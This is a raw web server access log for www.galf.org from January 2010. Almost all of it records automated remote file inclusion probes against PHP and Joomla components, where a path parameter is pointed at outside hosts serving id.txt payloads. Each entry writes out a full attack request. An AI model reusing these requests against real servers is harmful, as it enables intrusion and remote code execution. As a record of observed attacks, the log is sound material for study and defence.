67.195.37.161 - - [11/Jan/2010:03:19:49 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [11/Jan/2010:03:19:59 -0800] "GET /logs/access_091228.log HTTP/1.0" 200 6435147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.171.37.206 - - [11/Jan/2010:03:20:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [11/Jan/2010:03:20:02 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [11/Jan/2010:03:20:02 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:20:25 -0800] "GET /logs/access_090921.log/?sourcedir=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:20:25 -0800] "GET /?sourcedir=http://cep.fileave.com/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:20:25 -0800] "GET /logs/?sourcedir=http://cep.fileave.com/id1.txt? HTTP/1.0" 200 4783 "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:31 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:31 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:36 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:36 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [11/Jan/2010:03:21:41 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:10 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:10 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:10 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:16 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:16 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:03:22:16 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [11/Jan/2010:03:24:48 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:24:54 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:24:54 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:24:58 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:25:15 -0800] "GET /logs/access_090907.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.37.206 - - [11/Jan/2010:03:27:05 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [11/Jan/2010:03:27:05 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [11/Jan/2010:03:27:05 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [11/Jan/2010:03:27:27 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:02 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:02 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:02 -0800] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:06 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:06 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:31:06 -0800] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:02 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:02 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:02 -0800] "GET /logs/access_100104.log//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:03 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:03 -0800] "GET /logs/access_090831.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:03 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:05 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:05 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:03:32:05 -0800] "GET /logs/access_100104.log//components/com_simpleboard/file_upload.php?sbp=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:09 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:09 -0800] "GET /logs/access_091207.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:32:57 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:33:13 -0800] "GET /logs/access_090727.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:33:13 -0800] "GET /logs/access_090629.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:33:17 -0800] "GET /logs/access_091019.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:33:38 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:33:38 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:33:41 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:33:58 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:32 -0800] "GET /logs/access_091109.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:40 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:40 -0800] "GET /logs/access_091116.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:34:40 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:34:40 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:34:40 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:44 -0800] "GET /logs/access_090525.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:44 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:48 -0800] "GET /logs/access_090831.log//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:03:34:48 -0800] "GET /logs/access_091207.log//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:03:34:53 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:03:34:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:03:34:53 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:35:11 -0800] "GET /logs/access_091123.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:13 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:13 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:13 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:03:35:15 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:03:35:19 -0800] "GET /logs/access_090907.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:41 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:41 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:35:41 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:36:15 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:36:15 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:36:15 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:38:15 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:40:22 -0800] "GET /logs/access_090824.log%20%20//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:40:31 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:40:31 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:40:31 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:24 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:24 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:24 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:32 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:38 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:41:43 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:44:06 -0800] "GET /logs/access_090824.log%20%20//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:44:58 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:45:28 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:46:33 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:46:33 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:46:33 -0800] "GET /components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:47:10 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:47:15 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:47:39 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://avi0u.com/bbs/data/testt/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:47:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://avi0u.com/bbs/data/testt/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:47:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://avi0u.com/bbs/data/testt/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:48:42 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:48:42 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:48:44 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:48:47 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:49:13 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:53:30 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:03:53:37 -0800] "GET /logs/access_090824.log//include/bbs.lib.inc.php?site_path=http://avi0u.com/bbs/data/testt/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:54:29 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:54:29 -0800] "GET /logs/access_090831.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:54:29 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:54:36 -0800] "GET /logs/access_091207.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:54:38 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
